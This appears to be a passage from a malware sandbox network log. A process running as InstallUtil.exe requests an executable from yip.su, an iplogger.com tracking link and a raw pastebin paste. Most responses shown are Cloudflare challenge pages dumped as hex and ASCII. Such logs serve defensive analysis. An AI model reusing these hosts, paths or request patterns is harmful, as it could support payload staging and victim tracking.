2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 32 30 30 37 31 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 38 36 31 37 65 62 64 38 63 37 32 27 2c 63 48 61 73 68 3a 20 27 62 39 36 66 33 39 32 34 66 34 32 63 63 30 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 32 70 39 4c 79 76 6c 51 36 68 6c 70 31 67 77 6f 53 35 48 65 32 50 51 6a 5f 42 38 76 32 71 64 36 6f 76 68 70 73 51 4c 6f 31 5f 49 2d 31 37 32 33 33 36 38 31 31 30 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '20071',cRay: '8b1728617ebd8c72',cHash: 'b96f3924f42cc02',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=2p9LyvlQ6hlp1gwoS5He2PQj_B8v2qd6ovhpsQLo1_I-1723368110-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:21:50 UTC	1369	IN	Data Raw: 73 33 6a 36 48 43 70 4b 34 71 6f 37 77 49 57 68 66 6b 77 6a 73 43 52 73 4b 67 37 7a 65 53 46 47 6f 71 39 55 49 49 41 4e 36 41 58 78 77 45 53 37 67 49 74 42 46 4f 37 75 38 5a 59 52 4d 63 31 79 6e 57 70 61 70 30 44 75 6d 4a 41 6d 4e 6d 35 53 66 44 6a 52 77 56 41 55 67 73 69 4a 38 58 44 4d 49 4e 57 69 62 61 44 61 50 6c 62 39 32 39 5f 75 31 53 6b 38 55 65 6e 50 51 49 4d 44 79 76 4c 4b 47 71 66 64 32 62 31 4e 4e 76 2e 50 54 32 5f 51 77 55 54 33 6a 62 36 71 57 7a 79 59 48 5a 6e 41 78 50 30 4f 44 6c 51 58 37 2e 70 44 4e 70 6c 49 6e 39 58 38 31 66 72 4c 78 34 39 43 6f 38 70 62 30 54 31 48 44 4e 46 56 58 34 5a 49 46 77 74 4d 59 53 6e 71 42 55 4e 6f 30 49 4d 37 56 45 52 39 71 41 6b 51 6d 52 47 5a 71 53 56 62 6a 79 6e 71 70 6b 4f 73 77 6c 39 70 2e 46 6f 6a 74 57 6e Data Ascii: s3j6HCpK4qo7wIWhfkwjsCRsKg7zeSFGoq9UIIAN6AXxwES7gItBFO7u8ZYRMc1ynWpap0DumJAmNm5SfDjRwVAUgsiJ8XDMINWibaDaPlb929_u1Sk8UenPQIMDyvLKGqfd2b1NNv.PT2_QwUT3jb6qWzyYHZnAxP0ODlQX7.pDNplIn9X81frLx49Co8pb0T1HDNFVX4ZIFwtMYSnqBUNo0IM7VER9qAkQmRGZqSVbjynqpkOswl9p.FojtWn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49713	172.67.188.178	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:55 UTC	68	OUT	GET /1djqU4 HTTP/1.1 Host: iplogger.com Connection: Keep-Alive
2024-08-11 09:21:55 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:21:55 UTC	687	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 77 72 68 66 6d 74 4d 71 55 72 57 68 44 48 53 52 41 59 42 78 2f 50 4b 56 58 2b 6f 33 43 42 6c 7a 5a 79 47 55 61 42 58 39 33 39 38 51 64 70 67 44 35 36 50 4c 38 71 62 6d 52 56 50 54 42 48 78 72 48 71 49 2b 4d 6f 4d 43 69 39 66 37 71 77 74 58 58 67 56 55 2f 6d 4c 47 4c 30 56 30 2b 37 62 6a 38 65 31 78 53 57 47 31 44 76 63 3d 24 63 32 48 35 76 4d 68 33 35 39 71 54 47 67 77 45 49 41 68 43 62 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: wrhfmtMqUrWhDHSRAYBx/PKVX+o3CBlzZyGUaBX9398QdpgD56PL8qbmRVPTBHxrHqI+MoMCi9f7qwtXXgVU/mLGL0V0+7bj8e1xSWG1Dvc=$c2H5vMh359qTGgwEIAhCbA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 33 63 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3c12<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 6c 6f 67 67 65 72 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 32 37 36 38 38 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 38 38 31 36 66 31 64 34 32 36 31 27 2c 63 48 61 73 68 3a 20 27 30 66 32 66 63 63 31 62 35 36 65 66 32 66 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 64 6a 71 55 34 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 33 79 6e 57 72 31 4d 53 61 63 34 57 49 50 37 48 62 68 6e 77 56 48 34 46 47 70 43 74 63 55 68 64 55 34 37 71 62 50 4f 4b 44 73 73 2d 31 37 32 33 33 36 38 31 31 35 2d 30 2e 30 2e 31 2e 31 2d 33 36 34 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "iplogger.com",cType: 'managed',cNounce: '27688',cRay: '8b1728816f1d4261',cHash: '0f2fcc1b56ef2f2',cUPMDTk: "\/1djqU4?__cf_chl_tk=3ynWr1MSac4WIP7HbhnwVH4FGpCtcUhdU47qbPOKDss-1723368115-0.0.1.1-3646",cFPWv: 'g',cT
2024-08-11 09:21:55 UTC	1369	IN	Data Raw: 5a 66 58 52 43 6f 56 71 33 51 78 38 7a 63 7a 34 73 67 66 70 77 67 50 31 2e 64 73 53 61 36 41 48 45 4f 30 77 4a 65 76 56 54 58 6e 2e 54 4b 62 79 5a 57 5f 49 42 59 2e 6c 72 33 4c 67 49 52 62 4c 38 76 4f 65 6d 42 48 41 64 78 6b 45 52 63 79 5a 30 5a 55 42 36 74 58 6b 65 69 38 77 39 77 51 68 67 4c 35 72 7a 57 32 77 73 6f 37 63 48 33 56 67 59 66 4a 44 64 68 4c 36 47 33 6c 59 39 55 4b 4a 51 36 68 51 4a 2e 47 6f 64 54 6b 4f 31 68 65 2e 50 6e 30 6a 75 6c 44 54 45 55 58 63 71 38 79 68 63 35 42 61 77 6f 57 76 71 61 38 58 71 31 7a 42 53 39 65 73 2e 53 78 4c 4c 6a 65 61 67 6c 77 49 49 62 55 79 6f 33 5a 74 67 63 77 75 65 72 45 35 33 43 6a 59 5a 70 70 6e 43 5f 4b 30 70 41 36 4f 4b 64 64 41 50 5a 34 55 58 62 43 30 54 79 45 63 6d 41 73 63 42 69 37 6f 5f 75 6c 4f 5a 37 5a Data Ascii: ZfXRCoVq3Qx8zcz4sgfpwgP1.dsSa6AHEO0wJevVTXn.TKbyZW_IBY.lr3LgIRbL8vOemBHAdxkERcyZ0ZUB6tXkei8w9wQhgL5rzW2wso7cH3VgYfJDdhL6G3lY9UKJQ6hQJ.GodTkO1he.Pn0julDTEUXcq8yhc5BawoWvqa8Xq1zBS9es.SxLLjeaglwIIbUyo3ZtgcwuerE53CjYZppnC_K0pA6OKddAPZ4UXbC0TyEcmAscBi7o_ulOZ7Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49714	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:56 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:21:56 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:21:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1728865d0f0f6f-EWR
2024-08-11 09:21:56 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 